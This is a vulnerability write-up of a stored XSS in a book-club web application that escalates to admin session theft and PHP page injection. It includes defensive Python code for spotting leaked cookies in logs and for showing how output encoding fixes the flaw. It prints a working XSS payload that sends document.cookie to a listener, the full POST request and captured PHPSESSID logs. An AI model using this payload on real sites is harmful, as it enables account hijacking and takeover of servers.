Unauthenticated Stored Cross-Site Scripting to HTML injection to RCE

Summary

While testing a free and open-source software (FOSS) application, a flaw was identified where an unauthenticated threat actor could apply to join a book club, inject an XSS payload and steal application session cookies belonging to higher-privileged user accounts, including Admin and Club Admin. With the hijacked session cookie, the attacker can log in to the application as admin and add PHP code to the about-us and home pages; once a PHP shell has been written there, system commands can be run from the web browser.

Proof of Concept

Unauthenticated Stored XSS

Manual walkthrough: Apply to a club and click on Submit Application

Direct approach: Navigate to the following URL http://localhost/scas/?page=clubs/application_form&id=7

[Screenshot: the vulnerable input field on the club application form]

Insert the following payload in the firstname parameter:

m1st3r3"><img src=x onerror="this.src='http://127.0.0.1:8000/?'+document.cookie; this.removeAttribute('onerror');">

The POST request carrying the payload:

POST /scas/classes/Master.php?f=save_application HTTP/1.1
Host: localhost
Content-Length: 1326
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEWvm4hOYmjUAAlLT
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/scas/?page=clubs/application_form&id=7
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="id"

------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="club_id"

7
------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="firstname"

m1st3r3"><img src=x onerror="this.src='http://127.0.0.1:8000/?'+document.cookie; this.removeAttribute('onerror');">
------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="middlename"

------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="lastname"

test
------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="gender"

Male
------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="year_level"

2022
------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="section"

test
------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="email"

[email protected]
------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="contact"

0123456789
------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="address"

------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="message"

------WebKitFormBoundaryEWvm4hOYmjUAAlLT--

Start a Python HTTP server listening on port 8000 to capture the callback request:

PS C:\xampp\htdocs\scas> python -m http.server
Serving HTTP on :: port 8000 (http://[::]:8000/) ...
::ffff:127.0.0.1 - - [11/Apr/2022 22:54:46] "GET /?PHPSESSID=qvch5e9s97c9cfpsi23f2iureq HTTP/1.1" 200 -
::ffff:127.0.0.1 - - [11/Apr/2022 23:15:37] "GET /?PHPSESSID=qvch5e9s97c9cfpsi23f2iureq HTTP/1.1" 200 -
::ffff:127.0.0.1 - - [12/Apr/2022 10:26:35] "GET /?PHPSESSID=qvch5e9s97c9cfpsi23f2iureq HTTP/1.1" 200 -
::ffff:127.0.0.1 - - [12/Apr/2022 10:26:49] "GET /?PHPSESSID=qvch5e9s97c9cfpsi23f2iureq HTTP/1.1" 200 -
::ffff:127.0.0.1 - - [12/Apr/2022 10:32:01] "GET /?PHPSESSID=qvch5e9s97c9cfpsi23f2iureq HTTP/1.1" 200 -
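From the defender's side, the listener output above is exactly the pattern to hunt for in proxy or egress logs: a session cookie name turning up in the query string of a GET to an unexpected host. The following is an added example, not part of the original write-up, that parses lines in the format Python's http.server writes and reports every request that carries a named session cookie in its URL. The first and third sample lines are taken from the capture above; the other two are constructed non-matching lines.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample log. Two lines come from the capture in the write-up;
# the favicon and ?page=home lines are constructed to show non-matches.
SAMPLE_LOG = """\
::ffff:127.0.0.1 - - [11/Apr/2022 22:54:46] "GET /?PHPSESSID=qvch5e9s97c9cfpsi23f2iureq HTTP/1.1" 200 -
::ffff:127.0.0.1 - - [11/Apr/2022 22:55:01] "GET /favicon.ico HTTP/1.1" 404 -
::ffff:127.0.0.1 - - [12/Apr/2022 10:26:35] "GET /?PHPSESSID=qvch5e9s97c9cfpsi23f2iureq HTTP/1.1" 200 -
::ffff:127.0.0.1 - - [12/Apr/2022 10:30:00] "GET /?page=home HTTP/1.1" 200 -
"""

# http.server access-log line: client - - [timestamp] "METHOD PATH VERSION" STATUS SIZE
LOG_LINE = re.compile(
    r'^(?P<client>\S+) - - \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<version>\S+)" (?P<status>\d{3}) (?P<size>\S+)$'
)


def _query_pairs(path):
    """Split a request path's query string into (name, value) pairs.

    document.cookie joins cookies with '; ', so after URL-decoding a leaked
    value may look like 'PHPSESSID=abc; other=1'. Splitting on both '&' and
    ';' keeps each cookie as its own pair instead of hiding it in one value.
    """
    query = unquote(urlsplit(path).query)
    pairs = []
    for chunk in re.split(r"[&;]", query):
        chunk = chunk.strip()
        if "=" in chunk:
            name, value = chunk.split("=", 1)
            pairs.append((name.strip(), value.strip()))
    return pairs


def find_cookie_leaks(log_text, cookie_names=("PHPSESSID",)):
    """Return one record per request whose query string carries a session cookie."""
    leaks = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not an access-log line; skip rather than fail
        for name, value in _query_pairs(m.group("path")):
            if name in cookie_names:
                leaks.append({
                    "client": m.group("client"),
                    "timestamp": m.group("ts"),
                    "cookie": name,
                    "value": value,
                })
    return leaks


def leaked_session_ids(log_text, cookie_names=("PHPSESSID",)):
    """Distinct session ids seen in leak records: the set to invalidate server-side."""
    return {rec["value"] for rec in find_cookie_leaks(log_text, cookie_names)}


if __name__ == "__main__":
    for rec in find_cookie_leaks(SAMPLE_LOG):
        print(f'{rec["timestamp"]} {rec["client"]} leaked {rec["cookie"]}={rec["value"]}')
    print("sessions to revoke:", sorted(leaked_session_ids(SAMPLE_LOG)))
```

The set returned by leaked_session_ids is the actionable part of a response: each id in it is a session that should be destroyed on the server and its owner re-authenticated, since the cookie alone is enough to act as that user.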

Now, when an admin or a club admin logs in and views the applications, the stored XSS is triggered and the session cookie is sent to the listener. Once the cookie has been captured, it is possible to log in to the application as that user by presenting the cookie.
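The root cause is that the stored firstname value is written back into an HTML attribute without encoding, so the closing quote in the payload ends the attribute and the rest becomes a new img element with an onerror handler. The following is an added example, not code from the application or the original write-up: the application's own rendering code is not shown on the page, so render_unescaped is a stand-in for the flaw and render_escaped is its hardened form. It feeds both outputs through Python's own HTML parser to show what a browser would see in each case.

```python
from html import escape
from html.parser import HTMLParser

# The stored-XSS payload from the write-up, as submitted in the "firstname" field.
PAYLOAD = (
    "m1st3r3\"><img src=x onerror=\"this.src='http://127.0.0.1:8000/?'+document.cookie; "
    "this.removeAttribute('onerror');\">"
)


def render_unescaped(firstname):
    """Stand-in for the flaw: the stored value is concatenated straight into an attribute."""
    return f'<input type="text" name="firstname" value="{firstname}">'


def render_escaped(firstname):
    """Hardened form: entity-encode for the attribute context.

    quote=True also encodes the double and single quote, which is what the
    payload relies on to close the value attribute. The PHP equivalent is
    htmlspecialchars($value, ENT_QUOTES, 'UTF-8').
    """
    return f'<input type="text" name="firstname" value="{escape(firstname, quote=True)}">'


class _MarkupInspector(HTMLParser):
    """Records every element the parser sees and every on* attribute on it."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.handlers.append((tag, name.lower()))


def inspect(html_fragment):
    """Return (element tags, (tag, attribute) pairs for event handlers) in a fragment."""
    p = _MarkupInspector()
    p.feed(html_fragment)
    p.close()
    return p.tags, p.handlers


def event_handlers(html_fragment):
    return inspect(html_fragment)[1]


def element_tags(html_fragment):
    return inspect(html_fragment)[0]


if __name__ == "__main__":
    for label, html in (("unescaped", render_unescaped(PAYLOAD)),
                        ("escaped", render_escaped(PAYLOAD))):
        tags, handlers = inspect(html)
        print(f"{label:9s} elements={tags} event handlers={handlers}")
```

With the unescaped renderer the parser reports two elements, input and img, and an onerror handler on the img; with the escaped renderer it reports a single input whose value attribute merely contains the payload as text. Output encoding is the fix for the injection itself; setting the HttpOnly flag on the session cookie is the complementary control that would have kept document.cookie from exposing PHPSESSID even if a script had run.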

HTML Injection

With the admin's session cookie, it is possible to inject code into index.php and about-us.php to manipulate those pages and potentially gain command execution.